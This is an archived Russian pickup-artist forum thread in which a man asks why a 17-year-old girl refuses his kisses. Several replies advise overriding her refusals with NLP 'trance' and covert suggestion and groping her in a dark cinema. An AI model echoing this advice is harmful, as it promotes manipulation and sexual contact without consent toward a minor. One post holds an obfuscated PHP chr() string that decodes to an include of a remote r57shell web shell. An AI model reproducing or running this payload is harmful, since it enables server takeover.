Перейти к публикации
пикап.Форум

Её поведение.

Рекомендованные сообщения

Опубликовано:

Вообщем начал мутить с девушкой.

Типо знаки внимания к ней,(Кинестетил,шаблоны,НЛП практиковал, и даже язык тела) она на них отвечает, все вроде круто 3 дня ей давал понять ей, что типо у меня есть к ней небольшой интерес. (хотя баллов она на 7-7,5 по моей карте.)

Попытался поцеловать - Не далась.

Попробовал позже еще - Опять не далась.

Выждал время Опять тоже самое.

Сижу в инете.

Она пишет привет все такое поговорили.

Зашол разговор на тему отношений.

Я: А у тебя парень был?)))

Она:Да

Я:И что с ним случилось?

Она: (то-то то-то)

Я: понятно А ему удалось тебя поцеловать?))

Она:А к чему это?

Я: Решил спросить)) Мне например не удалось))

Она:радуйся что тогда по лицу не получил...

Я:за что???

Она:просто так...

Я:да ну тебя, я тебя не понимаю

что такого в поцелуи и почему я должен был за это получить?)))

Она:ну раз ничего так целуй кого-нибудь другого.

Я:хорошо так и поступлю.

Она:ок.

Я:Ты так говоришь как будто я последний моральный урод и поцелуй это как-будто что-то навроде изнасилования...

Она:ну не последний... давай замнем эту тему.

Я:спасибо обнадежила.

Она:Ох... пойду я лучше спать.

Я:пойди. сладких снов

Она:спасибо. пока.

При всем этом она проявляет интерес, пишет смс предлагает пойти смотреть звездопад на крышу, развод мостов, в кино, но почему-то не вдвоем(одну ее не вытащить), а еще с кем-нибудь.

Девочка вообще-то скромная, но довольно раскрытая.

Что с ней? Скромная? Чего-то боится? Замкнута? или что?

Опубликовано:

Чё тут гадать, тарканы у неё пасутся стадами...

Хочешь - трать ресурс на их вывождение оттуда, но оптимальный вариант ТnД

Опубликовано:

Мда.. насчет тараканов я даже не спорю, поэтому и спрашиваю сколько им лет, если по 16, то тогда это еще хорошо, но если 20, тогда девушку нафиг посылать надо.

Опубликовано:
Попытался поцеловать - Не далась.

Попробовал позже еще - Опять не далась.

Выждал время Опять тоже самое.

Я: Решил спросить)) Мне например не удалось))

Она:радуйся что тогда по лицу не получил...

Я:за что???

Она:просто так...

Я:да ну тебя, я тебя не понимаю

что такого в поцелуи и почему я должен был за это получить?)))

Она:Ох... пойду я лучше спать.

Я:пойди. сладких снов

Она:спасибо. пока.

Судя из лога, она диктует правила, и ты всй время уступаешь. ХЗ но ты вроле ло этого уже закосячил. Попробуй игнор. Но посмотрим чё старички скажут

Опубликовано:
17

тогда еще не все потеряно, но если хочешь ЛТР, то тебе придется делать самое трудное - выводить ее тараканов!

Почему она не хочет идти с тобой в кино без подруг? как она это объясняет?

Опубликовано:
Судя из лога, она диктует правила, и ты всй время уступаешь. ХЗ но ты вроле ло этого уже закосячил. Попробуй игнор. Но посмотрим чё старички скажут

Нет если меня не устраивают ее предложения я их отрицаю, ну зачем мне идти с ней и еще с разными левыми людьми куда-то? Это же дружеская прогулка называется.

Опубликовано:
Нет если меня не устраивают ее предложения я их отрицаю, ну зачем мне идти с ней и еще с разными левыми людьми куда-то? Это же дружеская прогулка называется.

Впинципе и на дружеской прогулке вам можно уединиться... Елси вы этого захотите

Опубликовано:
Почему она не хочет идти с тобой в кино без подруг? как она это объясняет?

Я:Так мы с тобой идем 20ого числа в кино?

Она:Нет давай 24.

Я:Почему?

Она:У подруг экзамены 20ого.

Я:Ну вот и отлично идем 20ого.

Она:Ну иди потом расскажешь...

Я:смешно.

Она:Скинь сайт с музыкой.

Я:www.nastya_poidem_20ogo_chisla.ru

Она: а серьезно?

Я:бла-бла-бла

Она:спасибо.

Я:Почему не пойти вдвоем?

Она:почему не пойти с еще кем-нибудь?

Я:Ты сначала ответь

Она:Затрудняюсь ответить.

Я:а ты попробуй хотя бы.

Она:Немогу.

и дальше бла-бла-бла.

Впинципе и на дружеской прогулке вам можно уединиться... Елси вы этого захотите

Если она целовать себя не дает, и пойти в кино вдвоем не хочет, как ее захотеть заставить уединится со мной??? Она только и добивается, чтобы не уединяться.

Опубликовано:

ППЦ у девушки тараканы прямо по всему телу ползают. НО тут, конечно, МОЖЕТ присутствовать и твоя ошибка в том, что ты ей просто ДРУГ. А раз ты ей просто друг, то неинтересно идти в кино с одним другом, поэтому и надо прихватить еще друзей.

Заинтересованность есть с ее стороны к тебе? мне кажется она отсутствует :(

Опубликовано:
Заинтересованность есть с ее стороны к тебе? мне кажется она отсутствует

Вот пример ее заинтерисованности:

Сидим мы с другом за столиком в клубе.

Она и ее подруга подсаживаются.

Я:Пойдем-те танцивать.

Она: Пойдем!

Ее подруга: Настя ты же тока сказала, что не хочешь.

Она:Теперь хочу.

НО тут, конечно, МОЖЕТ присутствовать и твоя ошибка в том, что ты ей просто ДРУГ. А раз ты ей просто друг, то неинтересно идти в кино с одним другом, поэтому и надо прихватить еще друзей

Логично, но я показывал ей, что я не просто друг. Причем это заметели все мои друзья и подруги...думаю она тоже))

Опубликовано:

мдяяяя..какие нахъ тараканы?? автор ты ведешься на любые ее действия..иди и бери ее.Диктуй свои правила игры.Асю убери.Только вызвоны и все.НЕ БЕГАЙ ЗА НЕЙ,все.

Опубликовано:

Aftor:

Отключи её мозги и тараканов как ветром сдует! (НЛП+Метафоры)

Тебе, как я понял из лога главное первый барьер взорвать, а потом должно уже легче пойти.

ЗЫ: Это может быть и проверкой. ("Действительно ли он со мной что-то серьёзное хочет или только постель?!" -> может быть её мысля)

Опубликовано:
Aftor:

НЛП я тока осваиваю...тяжело практиковать и не всегда выходит. А с книгами по НЛП без учителя сами понимаете.

автор ты ведешься на любые ее действия..

Я еще ни разу не соглашался идти с ней куда либо не вдвоем, после того время провождения когда я стал с ней мутить.

иди и бери ее

Вопрос в том как?

За руки и за ноги прям в халате из дома в кино? :lol:

Как ее вытащить то?

Опубликовано:
Вопрос в том как?

Как ее вытащить то?

Перестать с ней мямлить как ты это по аси делаешь.

А заломится к ней неплохая идея...с двдишками интересными :lol:

Опубликовано:

Вопрос в том как?

Как ее вытащить то?

Перестать с ней мямлить как ты это по аси делаешь.

А заломится к ней неплохая идея...с двдишками интересными :lol:

Что-то мне подсказывает, что все это кончится обломом...насколько я ее знаю...хотя я могу это сделать у нее тут как раз намечается пустая квартира.

Но вопрос в том, что мне делать?

Смотреть с ней DVD чтоли просто...друзья тоже DVD вместе смотрят...а она еще и подруг пригласит...вот весело то будет куча телок и парень смотрят DVD :lol:

Опубликовано:

****( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

Опубликовано:

Аффтар, в транс её нах, и якорями напичкать по самое нихачу... И АМ используй почаще... Рассказываешь ей метафору или паршиь всякую фуйню про гадание или про "какова любовь" и маркируй на себя при когда говоришь что-то типа "замечательный человек; любимый; с которым очень приятно находиться вместе", и якоря вешай... Глядишь, и после этого уже половина тараканов на твоё присутствие и поцелуи сдохла... Тока не бросайся на неё как абориген после тридлцателетнего воздержания. После такой мозго-промывки дай ей очухатся и почувствовать всё это - в среднем дня два, но лучше просто калибруй реакцию... Еси конечно приёмник обратной связи у тебя имеется/ещё жив...

Преестань в конце-то концов быть тряпкой, меняй своё ВС как писал Мэддисон...

Опубликовано:

Я вообще подумал, что ради одной такой телки столько нудной работы это не нормально.

Помойму легче другую найти.

И правда их вон скоко ходит только в окно посмотреть надо.

Ну ладно посмотрю че там как, попробую, если так же тупо будет забуду её.

• 2 недели спустя...
Опубликовано:

to Ather :)

пахоже на случай девственницы глупышки с ох№;%?но завинченной самооценкой. Родители напели :- " ты Самая ! жди Достойного! " а как достойный выглядит она не знает, отсюда сбой в программе :) Не парься, найди другую... с дурёхой держи дистанцию, увидишь у неё лучше получится тебя соблазнить :)

Опубликовано:

Не дается в губы, целуй в шею. От вы слюнообменники помешанные :)

Обязательно ли целовать в губы, чтобы трахнуть? А? И я вот не знаю :)

Она:почему не пойти с еще кем-нибудь?

- да действительно хорошая идея.

ты не обязан не кому уделять внимание кроме как к ней, или ты при друзьях не можешь в темном кинотеатре в трусы ей полезть? ну или хотя бы языком по шее?

эхх-хы-ых.

Опубликовано:
Не дается в губы, целуй в шею. От вы слюнообменники помешанные :)

Да, вот об этом я не подумал, почему-то не подумал.

Обязательно ли целовать в губы, чтобы трахнуть? А? И я вот не знаю :)

Ну чтобы её трахнуть, нужна глобальная работа.

Я вот думаю...а она вообще того не стоит.

Опубликовано:
Ну если того не стоит, ТО дальше смысла нет. Сам уже ответил. А так интересная ситуация.
ни одна девка не стоит таких нервов и гемора... ИМХО

Да, их еще пол планеты не считая одной)))

Опубликовано:

Aftor:

НЛП я тока осваиваю...тяжело практиковать и не всегда выходит. А с книгами по НЛП без учителя сами понимаете.

...

А это легче чем ты думаешь! Просто после хорошего анегдота вставляеш НЛП подгруз, цлов на 5-6 небольше, а потом дальше свою тему двигаешь.

Она не возразить, не понять ничего не успеет. Главное дальше говорить, а не смотреть на действие подгруза! Как действовать начнет сам заметишь :)

Опубликовано:

Таких стервочек простебать просто хорошенько нужно. Или в полный игнор. Как мне кажется, ты зря тратишь на неё время. Хорошее отношение она не ценит, как мужика (читай: как парня, с которым она была бы не прочь переспать) не воспринимает. Если же хочешь привести домой именно её, то здесь действительно стоит вести себя более жёстко. Вспомни один из главных постулатов пикапа: "Я нужен тебе, а не ты мне". Другими словами - классическое "чем меньше женщину мы любим..." B) .

Ей 17, а подростками правит дух противоречия. Из однажды услышанного разговора:

- Ты совершенно не умеешь отмазываться. Уламываает - ломайся подольше.

По-моему, более чем лаконично... :D

Архивировано

Эта тема находится в архиве и закрыта для публикации сообщений.

• Сейчас на странице   0 пользователей

• Нет пользователей, просматривающих эту страницу.
  • Новое

1. 1641

Продолжение (и окончание) истории с бывшим

2. 430

Измены жены с начальником. Ребенок. Возможно не от меня.

3. 14

А безопасно ли вообще приглашать к себе домой девушек?

4. 1641

5. 1641

• Создать...